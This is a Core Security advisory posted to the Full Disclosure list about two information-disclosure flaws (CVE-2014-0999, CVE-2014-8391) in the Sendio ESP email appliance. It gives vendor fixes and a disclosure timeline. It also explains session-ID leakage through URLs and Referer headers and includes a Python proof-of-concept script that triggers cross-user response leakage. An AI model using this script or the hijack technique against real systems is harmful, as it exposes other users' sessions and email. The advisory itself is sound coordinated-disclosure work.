[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] [CORE-2015-0010] - Sendio ESP Information Disclosure Vulnerability
From: CORE Advisories Team <advisories () coresecurity ! com>
Date: 2015-05-22 16:11:59
Message-ID: 555F554F.4000306 () coresecurity ! com
[Download RAW message or body]
1. Advisory Information
Title: Sendio ESP Information Disclosure Vulnerability
Advisory ID: CORE-2015-0010
Advisory URL: http://www.coresecurity.com/advisories/sendio-esp-information-disclosure-vulnerability
Date published: 2015-05-22
Date of last update: 2015-05-22
Vendors contacted: Sendio
Release mode: Coordinated release
2. Vulnerability Information
Class: OWASP Top Ten 2013 Category A2 - Broken Authentication and Session Management \
[CWE-930], Information Exposure [CWE-200]
Impact: Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0999, CVE-2014-8391
3. Vulnerability Description
Sendio [1] ESP (E-mail Security Platform) is a network appliance which provides \
anti-spam and anti-virus solutions for enterprises. Two information disclosure issues \
were found affecting some versions of this software, and can lead to leakage of \
sensitive information such as user's session identifiers and/or user's email \
messages.
4. Vulnerable Packages
Sendio 6 (14.1120.0)
Other products and versions might be affected too, but they were not tested.
5. Vendor Information, Solutions and Workarounds
Sendio informs us that [CVE-2014-0999] and [CVE-2014-8391] are fixed on Sendio \
software Version 7.2.4.
For [CVE-2014-0999], the vulnerability only exists for HTTP web sessions and not \
HTTPS web sessions. Sendio recommends that customers who have not upgraded to Version \
7.2.4 should disallow HTTP on their Sendio product and only use HTTPS.
6. Credits
This vulnerability was discovered and researched by Martin Gallo from Core Security's \
Consulting Services Team. The publication of this advisory was coordinated by \
Joaquín Rodríguez Varela from Core Security's Advisories Team.
7. Technical Description / Proof of Concept Code
7.1. Disclosure of session cookie in Web interface URLs
The Sendio [1] ESP Web interface authenticates users with a session cookie named \
"jsessionid". The vulnerability [CVE-2014-0999] is caused due the way the Sendio ESP \
Web interface handles this authentication cookie, as the "jsessionid" cookie value is \
included in URLs when obtaining the content of emails. The URLs used by the \
application follow this format:
http://<ESP-web-interface-domain>:<ESP-web-interface-port>/sendio/ice/cmd/msg/body;jsessionid=<session-identifier-value>?id=<message-id>
This causes the application to disclose the session identifier value, allowing \
attackers to perform session hijacking. An attacker might perform this kind of attack \
by sending an email message containing links or embedded image HTML tags pointing to \
a controlled web site, and then accessing the victim's session cookies through the \
"Referrer" HTTP header. Accessing this authentication cookie might allow an attacker \
to hijack a victim's session and obtain access to email messages or perform actions \
on behalf of the victim.
7.2. Response mixup in Web interface
The vulnerability [CVE-2014-8391] is caused by an improper handling of users' \
sessions by the Web interface. Under certain conditions, this could lead to the \
server disclosing sensitive information that was intended for a different user. This \
information includes, for instance, other users' session identifiers, email message \
identifiers or email message subjects. In order to trigger this vulnerability, \
requests should be authenticated.
The following Python script can be used to trigger this vulnerability under certain \
circumstances:
import requests
domain = "target.domain.com" # The target domain
port = 8888 # The target port
jsessionid = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" # A valid jsessionid
num = 100000 # No of request to make
msgid = 9999999 # A valid message id to baseline the \
requests
url = "http://%s:%d/sendio/ice/cmd/msg/body;jsessionid=%s" % (domain, port, \
jsessionid)
def make_request(id):
params = {"id": str(id)}
headers = {"Cookie": "JSESSIONID=%s" % jsessionid}
return requests.get(url, params=params, headers=headers)
print "[*] Reaching the target to define baseline"
r = make_request(msgid)
baseline_length = r.headers["content-length"]
print "[*] Defined baseline: %d bytes" % baseline_length
for id in range(0, num):
r = make_request(msgid)
rlength = int(r.headers["content-length"])
if r.status_code == 200 and rlength != baseline_length:
print "\t", r.status_code, rlength, r.text
else:
print "\t", r.status_code, rlength
8. Report Timeline
2015-03-26: Core Security sent an initial notification to Sendio informing them that \
multiple vulnerabilities were found in one of their products, and requested their PGP \
keys in order to start an encrypted communication.
2015-03-27: Sendio replied that they would not be able to use PGP keys, but stated \
that their In/out SMTP gateway uses TLS, so that should suffice. They detailed that \
they were working on a fix for the "CS_SENDIO_JSESSIONID_DISCLOSURE" vulnerability \
and estimated it would be released by the end of April, 2015. They requested \
additional technical details for the "CS_SENDIO_INFO_LEAK" \
vulnerability.
2015-03-30: Core Security informed that understood that Sendio may not be able to use \
PGP keys, but Core doesn't consider the use of TLS as a replacement for PGP. Core \
Security requested to receive confirmation from Sendio in case they wanted to keep \
the communications unencrypted with PGP in order to send them a draft version of the \
advisory.
2015-03-30: Sendio confirmed that the communication can remain "as is" without PGP. \
They will inform Core once they have a specific date for publishing the fix. Sendio \
requested a PoC for the "CS_SENDIO_INFO_LEAK vulnerability".
2015-03-31: Core Security sent a draft version of the advisory and PoC to Sendio.
2015-03-31: Sendio confirmed reception of the advisory and PoC and informed Core that \
they would provide an update on their test on April 6.
2015-04-06: Sendio informed Core that they were able to reproduce the \
"CS_SENDIO_INFO_LEAK" issue and that were still analyzing it in order to create a \
fix.
2015-04-07: Core Security requested an estimated date for the release of a \
fix/update.
2015-04-13: Core Security again requested an answer from Sendio regarding the release \
of a fix/update.
2015-04-13: Sendio informed Core they were still working on a fix for the JSession \
issue that covers all use cases across Microsoft Outlook and the various supported \
web browsers. For the "CS_SENDIO_INFO_LEAK" they had coded a fix that was undergoing \
a System Test. Sendio estimated the release would take place on May \
15, 2015.
2015-04-20: Sendio informed Core they were still planning to release the fixes by May \
15, 2015.
2015-04-20: Core Security thanked Sendio for the update and informed them they would \
schedule their security advisory accordingly.
2015-04-24: Core Security requested that Sendio delay the release date of the fixes \
until Monday, May 18 in order to avoid publishing them on a Friday.
2015-04-27: Sendio informed Core that many of their customers have their Sendio \
systems set to "automatically update" on weekends. Sendio requested Core publish \
their advisory a week after the fix is published. Sendio also requested the ability \
to add some workarounds into Core's advisory.
2015-04-28: Core Security informed Sendio that they understood their update policy \
and let them know that it is Core's policy to publish their advisory the same day the \
fix is released in order to inform the affected users of its availability. Core also \
stated that they were willing to add any workarounds Sendio proposed.
2015-05-05: Sendio informed Core that they were still having problems developing a \
fix for the JSession vulnerability, therefore they may have to postpone the release \
date from May 15 to May 22.
2015-05-07: Core Security thanked Sendio for the update and requested to be kept \
informed in order to have enough time to schedule their advisory.
2015-05-12: Sendio confirmed that they needed to delay the publication of the fixes \
until May 21. Additionally, Sendio sent Core the proposed workarounds to be added in \
Core's advisory and requested a draft copy of it.
2015-05-15: Core Security informed Sendio it would reschedule the publication of \
their advisory and would send them a draft copy of it once they produced the final \
version.
2015-05-20: Sendio informed Core that they would publish the fixes at 10 PM, May 21.
2015-05-20: Core Security informed Sendio that based on their publication time they \
would have to delay the release of the advisory until Friday 22.
2015-05-22: Advisory CORE-2015-0010 published.
9. References
[1] http://www.sendio.com/.
10. About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the \
future needs and requirements for information security technologies. We conduct our \
research in several important areas of computer security including system \
vulnerabilities, cyber attack planning and simulation, source code auditing, and \
cryptography. Our results include problem formalization, identification of \
vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs \
regularly publishes security advisories, technical papers, project information and \
shared software tools for public use at: http://corelabs.coresecurity.com.
11. About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with \
security test and measurement solutions that continuously identify and demonstrate \
real-world exposures to their most critical assets. Our customers can gain real \
visibility into their security standing, real validation of their security controls, \
and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and \
leading-edge threat expertise from the company's Security Consulting Services, \
CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 \
(617) 399-6980 or on the Web at: http://www.coresecurity.com.
12. Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 \
CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial \
Share-Alike 3.0 (United States) License: \
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, \
which is available for download at \
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic